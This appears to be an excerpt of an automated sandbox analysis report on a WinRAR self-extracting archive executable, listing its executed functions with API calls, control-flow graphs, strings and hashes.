21920->21922 21921 41cc16 RaiseException 21921->21907 21922->21924 21942 41ca3a 11 API calls 3 library calls 21922->21942 21943 41ca3a 11 API calls 3 library calls 21924->21943 21926 41cce4 RaiseException 21927 41c7ca ___delayLoadHelper2@8 11 API calls 21926->21927 21928 41ccfb 21927->21928 21928->21924 21930 41c7d6 21929->21930 21931 41c7fc 21929->21931 21951 41c878 8 API calls 2 library calls 21930->21951 21931->21903 21933 41c7db 21934 41c7f7 21933->21934 21952 41c9ca VirtualQuery GetSystemInfo VirtualProtect DloadObtainSection DloadMakePermanentImageCommit 21933->21952 21953 41c7fd GetModuleHandleW GetProcAddress GetProcAddress 21934->21953 21937 41d783 _ValidateLocalCookies 5 API calls 21938 41cab8 21937->21938 21938->21903 21939 41ca87 21939->21937 21940->21906 21941->21921 21942->21926 21943->21907 21945 41d78c 21944->21945 21946 41d78e IsProcessorFeaturePresent 21944->21946 21945->21912 21948 41ddb8 21946->21948 21954 41dd7c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 21948->21954 21950 41de9b 21950->21912 21951->21933 21952->21934 21953->21939 21954->21950 23896 4163c3 115 API calls 21960 409bc8 21961 409bdb 21960->21961 21963 409bd4 21960->21963 21962 409be1 GetStdHandle 21961->21962 21967 409bec 21961->21967 21962->21967 21964 409c41 WriteFile 21964->21967 21965 409c11 WriteFile 21966 409c0c 21965->21966 21965->21967 21966->21965 21966->21967 21967->21963 21967->21964 21967->21965 21967->21966 21969 409cb4 21967->21969 21971 406d5a 56 API calls 21967->21971 21972 406f67 68 API calls 21969->21972 21971->21967 21972->21963 23897 426fcb 71 API calls _free 23871 4186cb 22 API calls 23872 41aa99 101 API calls 4 library calls 23873 427ecd 6 API calls _ValidateLocalCookies 23660 41c0d0 23661 41c0dd 23660->23661 23662 40d142 54 API calls 23661->23662 23663 41c0f1 23662->23663 23664 403f5b _swprintf 51 API calls 23663->23664 23665 41c103 SetDlgItemTextW 23664->23665 23668 41991e PeekMessageW 23665->23668 23669 419939 GetMessageW TranslateMessage DispatchMessageW 23668->23669 23670 41995a 23668->23670 23669->23670 23813 417cd5 GetClientRect 23874 424ed4 55 API calls _free 23814 41aa99 96 API calls 4 library calls 23899 424bda 52 API calls 2 library calls 23846 40ddda FreeLibrary 23876 4016e3 79 API calls 23817 42c0e4 51 API calls 23902 41c3ea 19 API calls ___delayLoadHelper2@8 23821 4288fb GetCommandLineA GetCommandLineW 23780 4018fb 127 API calls __EH_prolog 23849 41d5ff 27 API calls pre_c_initialization 23822 409481 72 API calls 21955 41c782 21957 41c730 21955->21957 21956 41cabc ___delayLoadHelper2@8 19 API calls 21956->21957 21957->21956 21958 401383 75 API calls 3 library calls 23850 419584 GetDlgItem EnableWindow ShowWindow SendMessageW 23672 427695 23673 4276a0 23672->23673 23674 4279a7 11 API calls 23673->23674 23675 4276c9 23673->23675 23677 4276c5 23673->23677 23674->23673 23678 4276ed DeleteCriticalSection 23675->23678 23678->23677 23851 41899a GdipCloneImage GdipAlloc 23881 407a9b GetCurrentProcess GetLastError CloseHandle 23883 420e9d 48 API calls 23885 428aaa GetProcessHeap 23687 4010a9 23692 405b35 23687->23692 23693 405b3f __EH_prolog 23692->23693 23694 40ac66 75 API calls 23693->23694 23695 405b4b 23694->23695 23699 405d2a GetCurrentProcess GetProcessAffinityMask 23695->23699 23908 41aa99 91 API calls 3 library calls 23910 41e7b0 51 API calls 2 library calls 23911 414fb5 120 API calls __vswprintf_c_l 23781 428abc 31 API calls _ValidateLocalCookies

                                                                                      Executed Functions

                                                                                      Function 0041C131 Relevance: 43.9, APIs: 17, Strings: 8, Instructions: 199filesleeptimeCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                        • Part of subcall function 0040F353: GetModuleHandleW.KERNEL32 ref: 0040F36B
                                                                                        • Part of subcall function 0040F353: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040F383
                                                                                        • Part of subcall function 0040F353: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 0040F3A6
                                                                                        • Part of subcall function 00418B8E: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00418B96
                                                                                        • Part of subcall function 00419036: OleInitialize.OLE32(00000000), ref: 0041904F
                                                                                        • Part of subcall function 00419036: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00419086
                                                                                        • Part of subcall function 00419036: SHGetMalloc.SHELL32(004420E8), ref: 00419090
                                                                                        • Part of subcall function 00410722: GetCPInfo.KERNEL32(00000000,?), ref: 00410733
                                                                                        • Part of subcall function 00410722: IsDBCSLeadByte.KERNEL32(00000000), ref: 00410747
                                                                                      • GetCommandLineW.KERNEL32 ref: 0041C179
                                                                                      • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 0041C1A0
                                                                                      • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 0041C1B1
                                                                                      • UnmapViewOfFile.KERNEL32(00000000), ref: 0041C1EB
                                                                                        • Part of subcall function 0041BE0A: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0041BE20
                                                                                        • Part of subcall function 0041BE0A: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0041BE5C
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0041C1F4
                                                                                      • GetModuleFileNameW.KERNEL32(00000000,00457938,00000800), ref: 0041C20F
                                                                                      • SetEnvironmentVariableW.KERNEL32(sfxname,00457938), ref: 0041C221
                                                                                      • GetLocalTime.KERNEL32(?), ref: 0041C228
                                                                                      • _swprintf.LIBCMT ref: 0041C267
                                                                                      • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 0041C279
                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0041C27C
                                                                                      • LoadIconW.USER32(00000000,00000064), ref: 0041C293
                                                                                      • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_00019B4F,00000000), ref: 0041C2E4
                                                                                      • Sleep.KERNEL32(?), ref: 0041C312
                                                                                      • DeleteObject.GDI32 ref: 0041C351
                                                                                      • DeleteObject.GDI32(?), ref: 0041C35D
                                                                                        • Part of subcall function 0041A8D4: CharUpperW.USER32(?,?,?,?,00001000), ref: 0041A92C
                                                                                        • Part of subcall function 0041A8D4: CharUpperW.USER32(?,?,?,?,?,00001000), ref: 0041A953
                                                                                      • CloseHandle.KERNEL32 ref: 0041C39C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: EnvironmentFileHandleVariable$Module$AddressCharCloseDeleteObjectProcUpperView$ByteCommandCurrentDialogDirectoryGdiplusIconInfoInitializeLeadLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                                                                      • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$*aD$*xE$8yE$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                                                      • API String ID: 985665271-3219697885
                                                                                      • Opcode ID: af5e07c1555c2c84d6a4922d59d1ff582ccac8fd217c9b701d4ae393f59e959f
                                                                                      • Instruction ID: e41d0b845445bbc80ebc21388868f98e8fc96f21f123d44e16b90050ecfd5996
                                                                                      • Opcode Fuzzy Hash: af5e07c1555c2c84d6a4922d59d1ff582ccac8fd217c9b701d4ae393f59e959f
                                                                                      • Instruction Fuzzy Hash: 8561EC75944304AFD310AB65EC45FAB77A8AB49705F00443BF941A32A2DBBC9D84C7AD
                                                                                      Function 00418BD0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 92memorywindowCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 598 418bd0-418beb FindResourceW 599 418bf1-418c03 SizeofResource 598->599 600 418cc6-418cc8 598->600 601 418c23-418c25 599->601 602 418c05-418c14 LoadResource 599->602 603 418cc5 601->603 602->601 604 418c16-418c21 LockResource 602->604 603->600 604->601 605 418c2a-418c3f GlobalAlloc 604->605 606 418c41-418c4a GlobalLock 605->606 607 418cbf-418cc4 605->607 608 418cb8-418cb9 GlobalFree 606->608 609 418c4c-418c6a call 41e000 CreateStreamOnHGlobal 606->609 607->603 608->607 612 418cb1-418cb2 GlobalUnlock 609->612 613 418c6c-418c84 call 418b65 609->613 612->608 613->612 617 418c86-418c8e 613->617 618 418c90-418ca4 GdipCreateHBITMAPFromBitmap 617->618 619 418ca9-418cad 617->619 618->619 620 418ca6 618->620 619->612 620->619
                                                                                      APIs
                                                                                      • FindResourceW.KERNELBASE(00000066,PNG,?,?,00419AC8,00000066), ref: 00418BE1
                                                                                      • SizeofResource.KERNEL32(00000000,75295780,?,?,00419AC8,00000066), ref: 00418BF9
                                                                                      • LoadResource.KERNEL32(00000000,?,?,00419AC8,00000066), ref: 00418C0C
                                                                                      • LockResource.KERNEL32(00000000,?,?,00419AC8,00000066), ref: 00418C17
                                                                                      • GlobalAlloc.KERNELBASE(00000002,00000000,00000000,?,?,?,00419AC8,00000066), ref: 00418C35
                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00418C42
                                                                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00418C62
                                                                                      • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00418C9D
                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00418CB2
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00418CB9
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: Global$Resource$CreateLock$AllocBitmapFindFreeFromGdipLoadSizeofStreamUnlock
                                                                                      • String ID: PNG
                                                                                      • API String ID: 3656887471-364855578
                                                                                      • Opcode ID: 11a7bb7e9ba0bd1c6195af64aaecc2cce134a12b80e65160e9a6bb46c35eb7ad
                                                                                      • Instruction ID: 027c81f87c0e4551096a2a65dbaf1df2449b1300f4d00a981994960039cf4821
                                                                                      • Opcode Fuzzy Hash: 11a7bb7e9ba0bd1c6195af64aaecc2cce134a12b80e65160e9a6bb46c35eb7ad
                                                                                      • Instruction Fuzzy Hash: 9F219375502701AFC7219F21ED499ABBBACEF85790B00152EF845D2260EB36D840DAA9
                                                                                      Function 0040A273 Relevance: 7.6, APIs: 5, Instructions: 108fileCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 860 40a273-40a299 call 41cec0 863 40a29b-40a2ae FindFirstFileW 860->863 864 40a30d-40a316 FindNextFileW 860->864 867 40a334-40a3dd call 40f10e call 40b902 call 4101c1 * 3 863->867 868 40a2b4-40a2cf call 40b275 863->868 865 40a318-40a326 GetLastError 864->865 866 40a32c-40a32e 864->866 865->866 866->867 869 40a3e2-40a3f5 866->869 867->869 875 40a2d1-40a2e4 FindFirstFileW 868->875 876 40a2e6-40a2ef GetLastError 868->876 875->867 875->876 877 40a300 876->877 878 40a2f1-40a2f4 876->878 881 40a302-40a308 877->881 878->877 880 40a2f6-40a2f9 878->880 880->877 883 40a2fb-40a2fe 880->883 881->869 883->881
                                                                                      APIs
                                                                                      • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0040A16E,000000FF,?,?), ref: 0040A2A8
                                                                                      • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0040A16E,000000FF,?,?), ref: 0040A2DE
                                                                                      • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0040A16E,000000FF,?,?), ref: 0040A2E6
                                                                                      • FindNextFileW.KERNEL32(?,?,?,?,?,?,0040A16E,000000FF,?,?), ref: 0040A30E
                                                                                      • GetLastError.KERNEL32(?,?,?,?,0040A16E,000000FF,?,?), ref: 0040A31A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileFind$ErrorFirstLast$Next
                                                                                      • String ID:
                                                                                      • API String ID: 869497890-0
                                                                                      • Opcode ID: ee0707b88cfbf41a39d31c9d08f90c26b6fc268683a71314440f9656788be2fa
                                                                                      • Instruction ID: 9d5465c68fa34bb837becbe42a063a04a78451be81ad5d6fe627ca20fe6a8a86
                                                                                      • Opcode Fuzzy Hash: ee0707b88cfbf41a39d31c9d08f90c26b6fc268683a71314440f9656788be2fa
                                                                                      • Instruction Fuzzy Hash: 84417372604345AFC324DF64C884ADBF7E8FB49344F000A2EF999E3240D778A9648B96
                                                                                      Function 00424A5A Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetCurrentProcess.KERNEL32(?,?,00424A30,?,00437F68,0000000C,00424B87,?,00000002,00000000), ref: 00424A7B
                                                                                      • TerminateProcess.KERNEL32(00000000,?,00424A30,?,00437F68,0000000C,00424B87,?,00000002,00000000), ref: 00424A82
                                                                                      • ExitProcess.KERNEL32 ref: 00424A94
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: Process$CurrentExitTerminate
                                                                                      • String ID:
                                                                                      • API String ID: 1703294689-0
                                                                                      • Opcode ID: 61bf5375fc5058eb9408920b4b30729785bd6fbb779785a04af24fed71b4f404
                                                                                      • Instruction ID: 92f48a68b15b2d49dc508ca97df5ded98c263e542fe700474f32c0f20244dc61
                                                                                      • Opcode Fuzzy Hash: 61bf5375fc5058eb9408920b4b30729785bd6fbb779785a04af24fed71b4f404
                                                                                      • Instruction Fuzzy Hash: DEE04F31140114AFCF11AF14ED08A493B29EB40355F400129F80597131CB39DC42CB48
                                                                                      Function 00408409 Relevance: 3.9, APIs: 2, Instructions: 888COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 0040840E
                                                                                      • _memcmp.LIBVCRUNTIME ref: 00408870
                                                                                        • Part of subcall function 004080F8: CharUpperW.USER32(?,?,00000000,?,?,?,?,?,?,?,00000800,?,004086E9,?,-00000930,?), ref: 004081BB
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: CharH_prologUpper_memcmp
                                                                                      • String ID:
                                                                                      • API String ID: 4047935103-0
                                                                                      • Opcode ID: 8644dea7dd90d9d0dcb0ad9ec32607b6bc83ecbf229ce091f8f4b72909af33a9
                                                                                      • Instruction ID: ed9455dd345f3cf172517af0a44ea50c6d5855cc7d99124cd037af268590b978
                                                                                      • Opcode Fuzzy Hash: 8644dea7dd90d9d0dcb0ad9ec32607b6bc83ecbf229ce091f8f4b72909af33a9
                                                                                      • Instruction Fuzzy Hash: 94721B70504245AEDF15DF60C985BFA7769AF05304F0841BFE889BB2C3DB395A85CB68
                                                                                      Function 00415984 Relevance: .3, Instructions: 325COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: H_prolog
                                                                                      • String ID:
                                                                                      • API String ID: 3519838083-0
                                                                                      • Opcode ID: 369ae8b91fc30c096f104ed8bae41011c55f52051390716d4c8621b772ec02ea
                                                                                      • Instruction ID: b0a01614aa2493c05d0238137e6b8d6ffbb034026e74db866317788c2f10dc31
                                                                                      • Opcode Fuzzy Hash: 369ae8b91fc30c096f104ed8bae41011c55f52051390716d4c8621b772ec02ea
                                                                                      • Instruction Fuzzy Hash: 96D1D3B1608745CFCB14CF29C8847DBBBE0AF95308F08456EE8449B742D738E995CB9A
                                                                                      Function 00419B4F Relevance: 102.2, APIs: 46, Strings: 12, Instructions: 724COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 00419B54
                                                                                        • Part of subcall function 004012E7: GetDlgItem.USER32(00000000,00003021), ref: 0040132B
                                                                                        • Part of subcall function 004012E7: SetWindowTextW.USER32(00000000,004302E4), ref: 00401341
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: H_prologItemTextWindow
                                                                                      • String ID: !D$"%s"%s$*AD$*aD$*xE$-el -s2 "-d%s" "-sp%s"$<$@$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                                                                                      • API String ID: 810644672-1376706752
                                                                                      • Opcode ID: c3dd377082a04c0afc47a4a46e9c5adbca49641282bba88f413fda5fc62b1eb6
                                                                                      • Instruction ID: a060f55470dfea57963d31381489d9dc6aa3f9cd3f8b4e8441ac41b09f41bbb0
                                                                                      • Opcode Fuzzy Hash: c3dd377082a04c0afc47a4a46e9c5adbca49641282bba88f413fda5fc62b1eb6
                                                                                      • Instruction Fuzzy Hash: 8C42F371940305BAEB21AF609D49FEB3BA8AB16704F40007BF641B61D2D7BC4D94CB6E
                                                                                      Function 0040F353 Relevance: 77.3, APIs: 22, Strings: 22, Instructions: 314libraryfileloaderCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 257 40f353-40f375 call 41cec0 GetModuleHandleW 260 40f377-40f38e GetProcAddress 257->260 261 40f3c8-40f62f 257->261 262 40f3a0-40f3aa GetProcAddress 260->262 263 40f390-40f39d 260->263 264 40f635-40f640 call 42462a 261->264 265 40f6fd-40f72e GetModuleFileNameW call 40b88c call 40f10e 261->265 262->261 267 40f3ac-40f3c3 262->267 263->262 264->265 272 40f646-40f673 GetModuleFileNameW CreateFileW 264->272 277 40f730-40f73a call 40a8e0 265->277 267->261 275 40f6f1-40f6f8 CloseHandle 272->275 276 40f675-40f683 SetFilePointer 272->276 275->265 276->275 278 40f685-40f6a2 ReadFile 276->278 283 40f747 277->283 284 40f73c-40f740 call 40f309 277->284 278->275 280 40f6a4-40f6c9 278->280 282 40f6e6-40f6ef call 40ef07 280->282 282->275 292 40f6cb-40f6e5 call 40f309 282->292 287 40f749-40f74b 283->287 289 40f745 284->289 290 40f76d-40f78f call 40b902 GetFileAttributesW 287->290 291 40f74d-40f76b CompareStringW 287->291 289->287 294 40f791-40f795 290->294 300 40f799 290->300 291->290 291->294 292->282 294->277 298 40f797 294->298 299 40f79d-40f7a2 298->299 301 40f7a4 299->301 302 40f7d6-40f7d8 299->302 300->299 303 40f7a6-40f7c8 call 40b902 GetFileAttributesW 301->303 304 40f8e5-40f8ef 302->304 305 40f7de-40f7f5 call 40b8d6 call 40a8e0 302->305 310 40f7d2 303->310 311 40f7ca-40f7ce 303->311 315 40f7f7-40f858 call 40f309 * 2 call 40d142 call 403f5b call 40d142 call 418ccb 305->315 316 40f85d-40f890 call 403f5b AllocConsole 305->316 310->302 311->303 313 40f7d0 311->313 313->302 323 40f8dd-40f8df ExitProcess 315->323 322 40f892-40f8d7 GetCurrentProcessId AttachConsole call 4220b3 GetStdHandle WriteConsoleW Sleep FreeConsole 316->322 316->323 322->323
                                                                                      APIs
                                                                                      • GetModuleHandleW.KERNEL32 ref: 0040F36B
                                                                                      • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040F383
                                                                                      • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 0040F3A6
                                                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 0040F651
                                                                                      • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040F669
                                                                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040F67B
                                                                                      • ReadFile.KERNEL32(00000000,?,00007FFE,00430858,00000000), ref: 0040F69A
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0040F6F2
                                                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 0040F708
                                                                                      • CompareStringW.KERNEL32(00000400,00001001,004308A4,?,DXGIDebug.dll,?,?,00000000,?,00000800), ref: 0040F762
                                                                                      • GetFileAttributesW.KERNELBASE(?,?,00430870,00000800,?,00000000,?,00000800), ref: 0040F78B
                                                                                      • GetFileAttributesW.KERNEL32(?,?,0C,00000800), ref: 0040F7C4
                                                                                        • Part of subcall function 0040F309: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 0040F324
                                                                                        • Part of subcall function 0040F309: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0040DEC8,Crypt32.dll,?,0040DF4A,?,0040DF2E,?,?,?,?), ref: 0040F346
                                                                                      • _swprintf.LIBCMT ref: 0040F834
                                                                                      • _swprintf.LIBCMT ref: 0040F880
                                                                                        • Part of subcall function 00403F5B: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00403F6E
                                                                                      • AllocConsole.KERNEL32 ref: 0040F888
                                                                                      • GetCurrentProcessId.KERNEL32 ref: 0040F892
                                                                                      • AttachConsole.KERNEL32(00000000), ref: 0040F899
                                                                                      • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 0040F8BF
                                                                                      • WriteConsoleW.KERNEL32(00000000), ref: 0040F8C6
                                                                                      • Sleep.KERNEL32(00002710), ref: 0040F8D1
                                                                                      • FreeConsole.KERNEL32 ref: 0040F8D7
                                                                                      • ExitProcess.KERNEL32 ref: 0040F8DF
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l
                                                                                      • String ID: C$$C$,C$0C$@C$DC$DC$DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$\C$\C$`C$dwmapi.dll$kernel32$tC$uxtheme.dll$xC$xC$C$C
                                                                                      • API String ID: 1201351596-2325497224
                                                                                      • Opcode ID: 07e48d7f4da9327780b2520549f992f20d4961d0f7d647c363b49c247d8625ca
                                                                                      • Instruction ID: c5ec16332d21468965b7dae9243580e259513ee247f9db3461689cd90f44eb68
                                                                                      • Opcode Fuzzy Hash: 07e48d7f4da9327780b2520549f992f20d4961d0f7d647c363b49c247d8625ca
                                                                                      • Instruction Fuzzy Hash: B3D177B11083849BD734EF50D859B9FB7E8AF88704F10AA3FE58496680C7B89549CB5E
                                                                                      Function 0041AA45 Relevance: 33.7, APIs: 14, Strings: 5, Instructions: 438windowfileCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
